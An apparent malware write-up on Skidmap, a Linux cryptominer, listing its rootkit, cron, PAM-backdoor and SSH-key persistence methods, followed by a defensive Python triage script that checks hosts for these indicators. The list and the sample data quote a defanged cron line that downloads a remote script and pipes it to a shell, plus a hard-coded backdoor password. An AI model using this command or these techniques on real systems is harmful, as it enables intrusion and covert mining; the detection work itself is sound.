Skidmap is a cryptocurrency-mining malware first seen in 2019 that targets Linux systems.
Skidmap employs several anti-analysis and persistence techniques:
- installs a userland rootkit via LD_PRELOAD
- installs crontab persistence: */1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh
- disables SELinux
- adds a hard-coded SSH key to the root user’s authorized_keys file
- sets the authorized_keys file as immutable
- replaces pam_unix.so with a copy that grants access when provided with the hard-coded password Mtm$%889*G*S3%G
- replaces the ‘rm’ command with one that re-installs the crontab persistence
- logs stolen credentials to /usr/include/ilog.h
- decrypts payload components using the openssl command
- runs a watchdog process to make sure the mining component is running
- drops the /usr/bin/kaudited binary, which installs an LKM rootkit that hides the attacker’s network traffic and the mining process’s CPU usage statistics
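The list above maps directly onto host artifacts a responder can check. The following triage script is an added example (not Skidmap's code and not from any vendor tool) that turns each indicator into a check over a snapshot of those artifacts: download-and-execute cron entries, entries in /etc/ld.so.preload (the standard loader hook behind an LD_PRELOAD rootkit, an assumption about mechanism rather than a detail from the write-up), an immutable root authorized_keys, SELinux not enforcing, an `rm` that is no longer an ELF binary, a pam_unix.so digest that differs from the package manager's record, and the presence of /usr/bin/kaudited or /usr/include/ilog.h. The crontab and pam_unix.so paths, the library name in the constructed sample, and the digests are assumptions or constructed values, as marked in the comments.

```python
"""Host triage for the Skidmap indicators listed above.

Added example, not Skidmap's code and not from any vendor tool. The dropped-file
paths come from the write-up; the crontab, ld.so.preload and pam_unix.so paths
are assumptions about where a Linux host keeps these artifacts.
"""
import hashlib
import os
import re
import subprocess
import sys

LD_SO_PRELOAD = "/etc/ld.so.preload"  # standard LD_PRELOAD hook point (assumption)
ROOT_CRONTABS = ["/etc/crontab", "/var/spool/cron/root", "/var/spool/cron/crontabs/root"]
AUTHORIZED_KEYS = "/root/.ssh/authorized_keys"
RM_BINARY = "/bin/rm"
PAM_UNIX_CANDIDATES = ["/lib64/security/pam_unix.so",
                       "/lib/x86_64-linux-gnu/security/pam_unix.so"]
DROPPED_FILES = ["/usr/bin/kaudited", "/usr/include/ilog.h"]  # from the write-up

# A cron entry that fetches a remote script and pipes it straight into a shell,
# the shape of Skidmap's `*/1 * * * * curl -fsSL ... | sh` entry.
CURL_PIPE_SH = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def check_cron(lines):
    """Return active (non-comment) cron lines that download and execute."""
    return [l.strip() for l in lines
            if l.strip() and not l.lstrip().startswith("#") and CURL_PIPE_SH.search(l)]


def check_ld_preload(content):
    """Return every library listed in ld.so.preload; on most hosts it is absent or empty."""
    return [l.strip() for l in content.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def check_immutable(lsattr_line):
    """True when the flag field of an `lsattr` output line carries 'i' (immutable)."""
    fields = lsattr_line.split()
    return bool(fields) and "i" in fields[0]


def check_selinux(getenforce_output):
    """True when SELinux is not enforcing (Skidmap disables it)."""
    return getenforce_output.strip().lower() != "enforcing"


def check_not_elf(first_bytes):
    """True when a file that should be a compiled binary (rm) does not start with the ELF magic."""
    return first_bytes[:4] != b"\x7fELF"


def check_pam_unix(actual_sha256, expected_sha256):
    """True when the installed pam_unix.so digest differs from the package manager's record."""
    return actual_sha256.lower() != expected_sha256.lower()


def triage(snapshot):
    """Run every check over a snapshot dict and return (finding, evidence) pairs."""
    findings = []
    hits = check_cron(snapshot.get("cron_lines", []))
    if hits:
        findings.append(("cron download-and-execute entry", hits))
    libs = check_ld_preload(snapshot.get("ld_preload", ""))
    if libs:
        findings.append(("ld.so.preload entries (LD_PRELOAD rootkit)", libs))
    if check_immutable(snapshot.get("authorized_keys_lsattr", "")):
        findings.append(("root authorized_keys is immutable", [AUTHORIZED_KEYS]))
    se = snapshot.get("getenforce")
    if se is not None and check_selinux(se):
        findings.append(("SELinux not enforcing", [se.strip()]))
    if check_not_elf(snapshot.get("rm_magic", b"\x7fELF")):
        findings.append(("rm is not an ELF binary (possible replacement)", [RM_BINARY]))
    if ("pam_unix_sha256" in snapshot and "pam_unix_expected" in snapshot
            and check_pam_unix(snapshot["pam_unix_sha256"], snapshot["pam_unix_expected"])):
        findings.append(("pam_unix.so digest mismatch", [snapshot["pam_unix_sha256"]]))
    present = [p for p in snapshot.get("present_paths", []) if p in DROPPED_FILES]
    if present:
        findings.append(("Skidmap dropped files present", present))
    return findings


def _read(path, mode="r", size=-1):
    try:
        with open(path, mode) as fh:
            return fh.read(size)
    except OSError:
        return None


def _run(cmd):
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except OSError:
        return None


def collect_snapshot(pam_unix_expected=None):
    """Gather the artifacts from the live host (root is needed for crontabs and keys)."""
    snap = {"cron_lines": [], "present_paths": [p for p in DROPPED_FILES if os.path.exists(p)]}
    for path in ROOT_CRONTABS:
        text = _read(path)
        if text:
            snap["cron_lines"] += text.splitlines()
    snap["ld_preload"] = _read(LD_SO_PRELOAD) or ""
    out = _run(["lsattr", AUTHORIZED_KEYS])
    if out:
        snap["authorized_keys_lsattr"] = out
    out = _run(["getenforce"])
    if out:
        snap["getenforce"] = out
    magic = _read(RM_BINARY, "rb", 4)
    if magic:
        snap["rm_magic"] = magic
    for path in PAM_UNIX_CANDIDATES:
        data = _read(path, "rb")
        if data:
            snap["pam_unix_sha256"] = hashlib.sha256(data).hexdigest()
            break
    if pam_unix_expected:  # supply the digest recorded by rpm/dpkg for the installed package
        snap["pam_unix_expected"] = pam_unix_expected
    return snap


# Constructed snapshot of a compromised host; library name and digests are made up.
SAMPLE_SNAPSHOT = {
    "cron_lines": ["# m h dom mon dow command",
                   "*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh"],
    "ld_preload": "/usr/lib/libexample_hook.so\n",
    "authorized_keys_lsattr": "----i---------e----- /root/.ssh/authorized_keys",
    "getenforce": "Disabled\n",
    "rm_magic": b"#!/b",
    "pam_unix_sha256": "constructed-digest-a",
    "pam_unix_expected": "constructed-digest-b",
    "present_paths": ["/usr/bin/kaudited"],
}

if __name__ == "__main__":
    snapshot = collect_snapshot() if "--live" in sys.argv else SAMPLE_SNAPSHOT
    for name, evidence in triage(snapshot):
        print(f"[!] {name}: {', '.join(evidence)}")
```

Run without arguments to see the checks fire on the constructed sample; `--live` reads the real host. The pam_unix.so check only reports when a known-good digest is passed in, since the right reference is the package manager's record for the installed version, not a fixed value.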